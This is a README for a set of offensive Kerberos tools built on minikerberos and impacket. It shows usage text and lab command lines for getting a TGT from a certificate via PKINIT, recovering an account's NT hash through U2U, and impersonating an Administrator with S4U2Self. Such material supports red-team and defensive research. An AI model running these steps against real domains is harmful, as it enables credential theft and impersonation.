This repository contains some utilities for playing with PKINIT and certificates.


PKINIT tools

This repository contains some utilities for playing with PKINIT and certificates.
The tools are built on minikerberos and impacket. Accompanying blogpost with more context:


These tools are only compatible with Python 3.5+. Clone the repository from GitHub, install the dependencies and you should be good to go:

git clone
pip3 install impacket minikerberos

Using a virtualenv for this is recommended.


Request a TGT using a PFX file, either as file or as base64 encoded blob, or PEM files for cert+key. This uses Kerberos PKINIT and will output a TGT into the specified ccache. It will also print the AS-REP encryption key which you may need for the tool. Usage example:

(PKINITtools) [email protected]:~/PKINITtools$ python -h
usage: [-h] [-cert-pfx file] [-pfx-pass password] [-pfx-base64 BASE64] [-cert-pem file] [-key-pem file] [-dc-ip DC_IP] [-v]
                       domain/username ccache

Requests a TGT using Kerberos PKINIT and either a PEM or PFX based certificate+key

positional arguments:
  domain/username     Domain and username in the cert
  ccache              ccache file to store the TGT in

optional arguments:
  -h, --help          show this help message and exit
  -cert-pfx file      PFX file
  -pfx-pass password  PFX file password
  -pfx-base64 BASE64  PFX file as base64 string
  -cert-pem file      Certificate in PEM format
  -key-pem file       Private key file in PEM format
  -dc-ip DC_IP        DC IP or hostname to use as KDC
  -v, --verbose

(PKINITtools) [email protected]:~/PKINITtools$ python testsegment.local/s2019dc\$ -cert-pfx ~/impacket-py3/cert.pfx -pfx-pass hoi s2019dc.ccache
2021-07-27 21:25:24,299 minikerberos INFO     Loading certificate and key from file
2021-07-27 21:25:24,316 minikerberos INFO     Requesting TGT
2021-07-27 21:25:24,333 minikerberos INFO     AS-REP encryption key (you might need this later):
2021-07-27 21:25:24,333 minikerberos INFO     5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
2021-07-27 21:25:24,336 minikerberos INFO     Saved TGT to file

Use Kerberos U2U to submit a TGS request for yourself. This will include with the PAC which in turn contains the NT hash that you can decrypt with the AS-REP key that was used for your specific TGT. It's magic really. This tool requires a TGT resulting from PKINIT to be in your KRB5CCNAME env variable. Usage:

(PKINITtools) [email protected]:~/PKINITtools$ python -h
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

usage: [-h] -key KEY [-dc-ip ip address] [-debug] identity

positional arguments:
  identity           domain/username

optional arguments:
  -h, --help         show this help message and exit
  -key KEY           AS REP key from
  -dc-ip ip address  IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
  -debug             Turn DEBUG output ON

(PKINITtools) [email protected]:~/PKINITtools$ export KRB5CCNAME=s2019dc.ccache
(PKINITtools) [email protected]:~/PKINITtools$ python testsegment.local/s2019dc\$ -key 5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash

Uses Kerberos S4U2Self to request a service ticket that is valid on the host for which you've obtained a certificate. This ticket can then be used to interact with the original host. This only requires a TGT for the machine account of this host. This TGT should be in a ccache file that you specify in the kerberos_connection_url. The only accepted kerberos_connection_url for this example is one containing a ccache file, so for example kerberos+ccache://domain.local\\victimhostname\$:[email protected]. The SPN should be a service name on the host you are impersonating, you can't use this for delegation attacks (since it does not implement S4U2Proxy, there are plenty of tools already for that). Usage:

(PKINITtools) [email protected]:~/PKINITtools$ python -h
usage: [-h] [-v] kerberos_connection_url spn targetuser ccache

Gets an S4U2self ticket impersonating given user

positional arguments:
                        the kerberos target string in the following format kerberos+ccache://domain\user:file.ccache@
  spn                   the service principal in format /@ Example: cifs/[email protected] for a
                        TGS ticket to be used for file access on server "fileserver". IMPORTANT: SERVER'S HOSTNAME MUST BE USED, NOT IP!!!
  ccache                ccache file to store the TGT ticket in

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose

(PKINITtools) [email protected]:~/PKINITtools$ python kerberos+ccache://testsegment.local\\s2019dc\$:[email protected] cifs/[email protected] [email protected] out.ccache -v
2021-07-28 10:09:13,687 minikerberos INFO     Trying to get SPN with [email protected] for cifs/[email protected]
2021-07-28 10:09:13,695 minikerberos INFO     Success!
2021-07-28 10:09:13,696 minikerberos INFO     Done!




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